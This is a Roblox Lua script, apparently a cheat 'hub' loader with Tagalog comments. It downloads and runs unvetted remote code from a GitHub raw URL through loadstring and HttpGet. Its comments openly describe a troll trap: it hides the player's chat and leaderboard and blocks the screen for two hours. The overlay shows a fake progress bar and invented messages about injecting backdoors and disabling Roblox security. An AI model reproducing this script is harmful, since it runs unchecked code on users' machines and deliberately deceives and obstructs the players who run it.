local player = game.Players.LocalPlayer
local TweenService = game:GetService("TweenService")
local StarterGui = game:GetService("StarterGui")

local MAIN_WAIT_TIME = 2 * 60 * 60 -- 2 Hours
local DISCORD_LINK = "https://discord.gg/T8sksQsjmR"
local HUB_NAME = "SOLIX HUB"

local randomMessages = {
    "Bypassing Anti-Cheat...",
    "Waiting for server response...",
    "Injecting backdoor access...",
    "Decrypting hidden files...",
    "Securing connection...",
    "Scanning vulnerabilities...",
    "Downloading Solix modules...",
    "Disabling Roblox security..."
}

-- ==================================================================
-- 1. I-EXECUTE ANG TOTOONG HUB (PERMANENT)
-- ==================================================================
-- Patatakbuhin natin agad yung totoong script sa background
task.spawn(function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/habibbib01/Solix.Hub.ETFB/refs/heads/main/loader.lua'))()
end)

-- ==================================================================
-- 2. THE TROLL DELAY (1.5 Seconds)
-- ==================================================================
-- Hahayaan natin silang makita yung totoong menu nang sandali para umasa sila
task.wait(1.5)

-- ==================================================================
-- 3. THE 2-HOUR OVERLAY TRAP
-- ==================================================================
-- Patayin ang default UI ng Roblox (Chat, Leaderboard)
pcall(function()
    StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, false)
end)

local gui = Instance.new("ScreenGui")
gui.Name = "FakeTrollOverlay"
gui.ResetOnSpawn = false
gui.IgnoreGuiInset = true -- True Full Screen
gui.DisplayOrder = 999999999 -- Pinakamataas para mabaon yung totoong Star Hub
gui.Parent = player:WaitForChild("PlayerGui")

local mainBg = Instance.new("Frame")
mainBg.Size = UDim2.new(1, 0, 1, 0)
mainBg.BackgroundColor3 = Color3.fromRGB(5, 0, 0) -- Pitch black/dark red
mainBg.BorderSizePixel = 0
mainBg.Parent = gui

local container = Instance.new("Frame")
container.AnchorPoint = Vector2.new(0.5, 0.5)
container.Position = UDim2.new(0.5, 0, 0.5, 0)
container.Size = UDim2.new(0.9, 0, 0.5, 0) -- Mobile fitted
container.BackgroundTransparency = 1
container.Parent = mainBg

local layout = Instance.new("UIListLayout")
layout.Parent = container
layout.HorizontalAlignment = Enum.HorizontalAlignment.Center
layout.VerticalAlignment = Enum.VerticalAlignment.Center
layout.Padding = UDim.new(0, 20)

local title = Instance.new("TextLabel")
title.Size = UDim2.new(1, 0, 0.3, 0)
title.BackgroundTransparency = 1
title.Text = HUB_NAME
title.TextColor3 = Color3.fromRGB(255, 0, 0)
title.Font = Enum.Font.GothamBlack
title.TextScaled = true
title.Parent = container

local titleStroke = Instance.new("UIStroke")
titleStroke.Color = Color3.fromRGB(80, 0, 0)
titleStroke.Thickness = 2
titleStroke.Parent = title

local mainBarBg = Instance.new("Frame")
mainBarBg.Size = UDim2.new(0.9, 0, 0, 10)
mainBarBg.BackgroundColor3 = Color3.fromRGB(40, 0, 0)
mainBarBg.BorderSizePixel = 0
mainBarBg.Parent = container
Instance.new("UICorner", mainBarBg).CornerRadius = UDim.new(1, 0)

local mainBarFill = Instance.new("Frame")
mainBarFill.Size = UDim2.new(0, 0, 1, 0)
mainBarFill.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
mainBarFill.BorderSizePixel = 0
mainBarFill.Parent = mainBarBg
Instance.new("UICorner", mainBarFill).CornerRadius = UDim.new(1, 0)

local statusText = Instance.new("TextLabel")
statusText.Size = UDim2.new(1, 0, 0.15, 0)
statusText.BackgroundTransparency = 1
statusText.Text = "Locking environment..."
statusText.TextColor3 = Color3.fromRGB(200, 200, 200)
statusText.Font = Enum.Font.GothamSemibold
statusText.TextScaled = true
statusText.Parent = container

local discordLabel = Instance.new("TextLabel")
discordLabel.Size = UDim2.new(1, 0, 0.1, 0)
discordLabel.BackgroundTransparency = 1
discordLabel.Text = "Discord: " .. DISCORD_LINK
discordLabel.TextColor3 = Color3.fromRGB(180, 50, 50)
discordLabel.Font = Enum.Font.Gotham
discordLabel.TextScaled = true
discordLabel.Parent = container

-- ANIMATION LOGIC
task.spawn(function()
    local startTime = tick()
    local endTime = startTime + MAIN_WAIT_TIME
    
    TweenService:Create(mainBarFill, TweenInfo.new(MAIN_WAIT_TIME, Enum.EasingStyle.Linear), {Size = UDim2.new(1, 0, 1, 0)}):Play()
    
    while tick() < endTime do
        local elapsed = tick() - startTime
        local percentage = math.clamp(math.floor((elapsed / MAIN_WAIT_TIME) * 100), 0, 99)
        
        local chosenMessage = randomMessages[math.random(1, #randomMessages)]
        statusText.Text = chosenMessage .. " [" .. percentage .. "%]"
        
        task.wait(math.random(3, 6))
    end
    
    -- Pag natapos ang 2 hours, tatanggalin na ang trap at makikita na ulit nila yung totoong hub
    statusText.Text = "Injection Complete! [100%]"
    mainBarFill.Size = UDim2.new(1, 0, 1, 0)
    task.wait(2)
    
    pcall(function()
        StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, true)
    end)
    gui:Destroy()
end)
